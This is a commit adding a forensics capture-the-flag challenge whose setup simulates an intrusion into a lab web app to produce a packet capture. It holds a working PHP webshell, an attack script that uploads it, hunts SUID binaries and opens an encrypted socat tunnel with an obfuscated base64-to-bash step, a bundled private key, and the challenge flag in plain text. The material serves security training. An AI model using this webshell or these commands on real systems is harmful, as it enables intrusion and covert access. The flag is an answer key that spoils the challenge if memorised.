(forensics): Added challenge underground watch part 2

forensics/underground_watch_part_2/challenge.yml

@@ -0,0 +1,33 @@
+name: "Underground Watch - Part 2" 
+author: "sAINT_barber"
+category: forensics
+
+description: |
+  We saw the attacker gain access on our surveillance application and execute a few commands, but then, the attacker disappeared, almost like they went through an underground tunnel.. 
+  We still have the packet capture, if this can help you understand what they did?
+
+  Note: Solution to Underground Watch - Part 1 is required to solve this challenge
+
+
+value: 500
+type: dynamic_docker
+extra:
+  initial: 500
+  minimum: 100
+  decay: 50
+  redirect_type: http
+  compose_stack: !filecontents docker-compose.yml
+
+
+flags:
+  - CCSC{tuNn3L1n9_w17H_iMP3rf3c7_f0rw4rd_53cr3Cy}
+
+tags:
+  - forensics
+  - medium
+
+files:
+  - "public/forgotten-classes.zip"
+
+state: visible
+version: "0.1"

forensics/underground_watch_part_2/docker-compose.yml

@@ -0,0 +1,7 @@
+services:
+
+  app:
+    # image: ghcr.io/cybermouflons/ccsc2024/underground_watch_part_2:latest # Add in prod
+    build: ./setup/
+    ports:
+      - 3002:80

forensics/underground_watch_part_2/setup/.dockerignore

@@ -0,0 +1 @@
+Dockerfile

forensics/underground_watch_part_2/setup/Dockerfile

@@ -0,0 +1,28 @@
+FROM php:7.4-apache
+
+RUN apt-get update && apt-get install -y socat netcat net-tools
+
+WORKDIR /var/www/html
+
+COPY css css
+COPY fonts fonts
+COPY images images
+COPY js js
+COPY uploads uploads
+COPY index.php index.php
+COPY upload.php upload.php
+
+# Populate challenge with orion_shell
+COPY bot_commands/orion_shell.php uploads/orion_shell.php 
+
+RUN chown -R www-data:www-data /var/www/html
+
+COPY entrypoint.sh /entrypoint.sh
+RUN chmod +x /entrypoint.sh
+
+# Populate challenge with certificate file
+COPY bot_commands/certificate.pem /var/log/apache2/.project-echo.pem
+RUN chown www-data:www-data /var/log/apache2/.project-echo.pem
+
+
+ENTRYPOINT ["/entrypoint.sh"]

forensics/underground_watch_part_2/setup/bot_commands/bot.sh

@@ -0,0 +1,48 @@
+#!/bin/bash
+host=172.23.0.2
+
+# Attacker uploads webshell
+curl -F 'file=@orion_shell.php' http://$host/upload.php
+sleep 3
+
+# Attacker tests shell
+curl -d 'cmd=whoami' http://$host/uploads/orion_shell.php
+sleep 1
+curl -d 'cmd=ls -la' http://$host/uploads/orion_shell.php
+sleep 1
+curl -d 'cmd=echo Im in!' http://$host/uploads/orion_shell.php
+sleep 1
+
+# Attacker creates certificate for tunnel
+curl -d 'cmd=openssl genrsa -out /tmp/server.key 2048' http://$host/uploads/orion_shell.php
+sleep 1
+curl -d 'cmd=openssl req -new -key /tmp/server.key -x509 -days 365 -out /tmp/server.crt -subj "/C=CY/ST=KapouMagika_hehe/O=Dis/CN=cybermouflons.com"' http://$host/uploads/orion_shell.php
+sleep 1
+
+# Attacker searches for location
+curl -d 'cmd=find / -type d -writable 2>/dev/null' http://$host/uploads/orion_shell.php
+sleep 1
+
+curl -d 'cmd=echo I hope nobody is looking!' http://$host/uploads/orion_shell.php
+sleep 1
+
+curl -d 'cmd=find / -type f -perm -4000 -exec ls -la {} \;' http://$host/uploads/orion_shell.php
+sleep 1
+
+# Attacker creates PEM file for tunnel and hides it
+curl -d 'cmd=cat /tmp/server.key /tmp/server.crt > /tmp/certificate.pem' http://$host/uploads/orion_shell.php
+sleep 1
+
+# Attacker deletes the certificate and private key
+curl -d 'cmd=rm /tmp/server.key /tmp/server.crt' http://$host/uploads/orion_shell.php
+sleep 1
+
+
+curl -d 'cmd=echo I should hide the rest of my commands!' http://$host/uploads/orion_shell.php
+sleep 1
+
+# Attacker creates tunnel using SSL encryption
+curl -d 'cmd=socat openssl-listen:31337,reuseaddr,cert=$(echo K0WZw5yboNWZtQ3Ylp2byBnLvITZoNWYwF2Ln9GbvIXY29CIvh2YltTblBnLvh2Yl1CdjVmavJHcu8iMlh2YhBXYvc2bs9ichZ3Lg0WZw5SZ0F2YpZWa0JXZj9CctR3LgYXb | rev | base64 -d | bash),verify=0,cipher=AES256-GCM-SHA384,fork tcp:localhost:12345' http://$host/uploads/orion_shell.php
+sleep 1
+
+

forensics/underground_watch_part_2/setup/bot_commands/certificate.pem

@@ -0,0 +1,48 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpAIBAAKCAQEA04o+goPce9ZHKNdTqdTv2xVPViEz+YxPW+P0hEpsEKDcGL8Z
+TYusfYWPTe5IVAmHIlCefCag7dR9v2ctiE9ZF7Tj8jEUHmTv5P0z6J9oG9RNpv/4
+iRkh1YIEhUMnEVW5HenbSxJj1B17IvvUrcN6z6+K62VF9HmpfD28nVenRpZmkCP4
+FS0fFpyJHup6J7AGimy446fKU0vo8G1KoDnHP8UK7AFsxI5Kbz7ubuUufmP70tS2
+roOLexClbRgaOa0arLFnkyL3RuVRUIJjU8vpHFQXnzBN1+nUY2/EiZyY1kK5kHk9
+8hsZuY+ZU+fVbfxXOrWkHKtgZsLy4/WNXsn3tQIDAQABAoIBAFsMtbsXZl8m65n4
+lFoU/OgfU/aOdACFE+NJSoVmQv0lP5anKgzmgWfFhNjWJuuE7lUmvhBR0BKN01H+
+5uo0vPQnN7WWykIKz/aPxTfq5LSVvJaUtjTMTHPJcoipTrd3XiYx8eFuGOnDhqyY
+GAJykPmzZOfMvz9q3jhLmlNe1vDaIwXudoDSnqC3F1MXpGuWl+hJyrxt/LiJSkMO
+tv2JAQZpTtoN4nfgw8uvBHtWMEbEAvL7MFhKujTDOAOKNSFpc/72jjWvv3+XFr5A
+gTHxaPUerSDi8fMU3J06ypRgBTT/VIzHc907JwFKEVmUKkQKmFC1tRyigorb4WZi
++JVX1EECgYEA7t4508E8LTLPVzOkDRcsXmi/1r4NsaNfj+COowlVhd9a5THr4Bwz
+KaIsy6xpOqZnmEvHKyrkJzHIUG4VprL1KatAx70Hl5lak15+DFCi/OIUWEZYmzL1
+Bcz1E1RCUtBFjCn5FlA1w91HDhpRIyiWMBWc6PTxWLREwGZ/XrdfTusCgYEA4rZB
+4RqAahdMUsnjCUcoSjFXnpGztwyCwcoWwjJDYQl8r6SfhxZkwEVG2CytzGABhy9d
+YO/YudFdapIVijfiSvUlk/am3uKgwYbu/92sPHe/XTDo86R1dpLIKXKIpx8RkJyy
++LAikwZiOLbaLsjEbOMLnA9DQhgm9jVmOARYa98CgYEAy59+1ieEn9cPbvujnlEh
+zn0nA+1RiRuG7AR2Mz9Su2NSfczXkV0YtCX+X8Viks+lwerfJspSYaMLapzdMhSd
+716AQ4S9gxsEXloPw3m95yrmQvX8tJh0zPQR+t86BpRqpPhm0QGhQ41O9BO1FO6V
+UPorn16mmoJZlVYKv/g7c+8CgYEAiF2QatICA85XvkRpJ5+BgH8FcP+61ZPU4rOn
+1M9e7/NA6HVg72Rs3anN3yGguJnW0XWP+UrLVZm1UvDju+u5VdT28XUfElnG0CFV
+iNnRS93LYUaWGFcHwHaxpxyZTczGR/G5RRTM9xqT4gE6Y4GnhMdcqFYV4p+cb+PW
+xEL43IkCgYAHyxx+nQxSEu2qPJQHRu6H5t8QUBAdg9plcRjYIHLLY7H1g+xmT4D9
+0ax4x+gW24+igBiPicBbDZ/tb8QTaTBGGYZbaJ+pmAS6ASXjXHMxjfsPWL9mC0HX
+bokUraJZ2I+AmmLWyCZMCZUkoh7i0ir4zVGWh+QVpTOobTuz+zduRw==
+-----END RSA PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIDhTCCAm2gAwIBAgIUGp0yyCd/TUk0IFeZCxS2NPQZD18wDQYJKoZIhvcNAQEL
+BQAwUjELMAkGA1UEBhMCQ1kxGTAXBgNVBAgMEEthcG91TWFnaWthX2hlaGUxDDAK
+BgNVBAoMA0RpczEaMBgGA1UEAwwRY3liZXJtb3VmbG9ucy5jb20wHhcNMjQwNDI5
+MTI0NDUzWhcNMjUwNDI5MTI0NDUzWjBSMQswCQYDVQQGEwJDWTEZMBcGA1UECAwQ
+S2Fwb3VNYWdpa2FfaGVoZTEMMAoGA1UECgwDRGlzMRowGAYDVQQDDBFjeWJlcm1v
+dWZsb25zLmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANOKPoKD
+3HvWRyjXU6nU79sVT1YhM/mMT1vj9IRKbBCg3Bi/GU2LrH2Fj03uSFQJhyJQnnwm
+oO3Ufb9nLYhPWRe04/IxFB5k7+T9M+ifaBvUTab/+IkZIdWCBIVDJxFVuR3p20sS
+Y9QdeyL71K3Des+viutlRfR5qXw9vJ1Xp0aWZpAj+BUtHxaciR7qeiewBopsuOOn
+ylNL6PBtSqA5xz/FCuwBbMSOSm8+7m7lLn5j+9LUtq6Di3sQpW0YGjmtGqyxZ5Mi
+90blUVCCY1PL6RxUF58wTdfp1GNvxImcmNZCuZB5PfIbGbmPmVPn1W38Vzq1pByr
+YGbC8uP1jV7J97UCAwEAAaNTMFEwHQYDVR0OBBYEFJkg7mmNaSOrlXPm9KmRxVDF
+MCU1MB8GA1UdIwQYMBaAFJkg7mmNaSOrlXPm9KmRxVDFMCU1MA8GA1UdEwEB/wQF
+MAMBAf8wDQYJKoZIhvcNAQELBQADggEBAIyZLYv5zoF/iLByenpMmuixxdwm4zVW
+qvMAtTYMEmWedp2D36zGdc8MJgezI1twOH/gJGMbU95BflzjNPx4TMwEPP9b7+lQ
+Z18tIq3cWEmlAcDx1DZn5LD9JYt8WQh+U7dS471WEc8DDNAUCflpaszKR6G41XlH
+DzrfwPwJpt+GCrgCV6Ds8tco7+hm8js9MuKBUUc1POMWlK1n0CArm9UHnaEHiVKX
+Y7CMU02VkG+r8Vi4oOlXCyzFYv6x4r6CzPsMsXEA7wFnRC6uFHbeZy2YOorM0t0l
+8brhIE4x2pFBUBsMlfhwW2r/ffaDklTQ+J9FFXTb2OfDIhAm2ci39dk=
+-----END CERTIFICATE-----

forensics/underground_watch_part_2/setup/bot_commands/orion_shell.php

@@ -0,0 +1,4 @@
+<?php
+
+system($_REQUEST['cmd']); 
+

forensics/underground_watch_part_2/setup/bot_commands/send_flag.sh

@@ -0,0 +1,17 @@
+#!/bin/bash
+host=172.23.0.2
+
+echo "Sending flag..."
+# Attacker uses tunnel to send requests to the internal port 12345
+curl --tlsv1.2 --tls-max 1.2 -d "x=Now i can hack in private!" https://$host:31337 -k
+sleep 1
+
+curl --tlsv1.2 --tls-max 1.2 -d "x=Since i am using HTTPS nobody can read the requests through this tunnel! MUAHAHAHA" https://$host:31337 -k
+sleep 1
+
+curl --tlsv1.2 --tls-max 1.2 -d "x=I can even send secrets through here like this flag, CCSC{tuNn3L1n9_w17H_iMP3rf3c7_f0rw4rd_53cr3Cy}" https://$host:31337 -k
+sleep 1
+
+curl --tlsv1.2 --tls-max 1.2 -d "x=I think i should delete the certificate file after I've finished!" https://$host:31337 -k
+sleep 1
+echo "Done..."